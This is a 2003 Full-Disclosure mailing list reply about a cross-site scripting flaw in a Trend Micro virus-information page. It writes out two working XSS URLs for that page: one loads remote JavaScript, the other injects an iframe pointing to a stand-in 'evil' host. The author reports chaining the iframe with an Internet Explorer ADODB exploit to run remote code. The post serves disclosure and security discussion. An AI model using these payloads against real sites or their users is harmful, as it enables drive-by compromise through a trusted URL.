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Re: [Full-Disclosure] Selfmade worms in the wild ;)



well... lets see, we could make it an untrusted link by

"
http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&;
VName=WORM_MSBLAST.<script%20language="JavaScript"%20src="http://www.astalavista
.com/backend/news.js"%20type="text/javascript"></script> "

and include some remote javascript of our choice, or the latest IE ADODB explot.
the obvious choice for that would be the classic..

http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&;
VName=WORM_MSBLAST.<iframe
src="http://some-evil-host/script/orhtml/etc/bla/";></iframe>

for everones info, the above was tested with the ADODB exploit to execute
remote code... sucessfully i might add. ( unpatched IE )

this goes to show that XSS is still very much a security concern, especially
coupled together with the lastest browser exploit to become a very dangerous
vector of attack, especially by way of a previously "trusted" URL.

this is not looking real good for trend.

good job Mo 8-)

morning_wood
http://exploitlabs.com
http://e2-labs.com

----- Original Message -----
From: "Redaktion-Kryptocrew" <momolly@kryptocrew.de>
To: <full-disclosure@lists.netsys.com>
Sent: Friday, August 29, 2003 12:02 AM
Subject: [Full-Disclosure] Selfmade worms in the wild ;)


> You can change id's and names...
> -mo-
> Kryptocrew
> .: your security advisor team :.           mailto:momolly@kryptocrew.de
>

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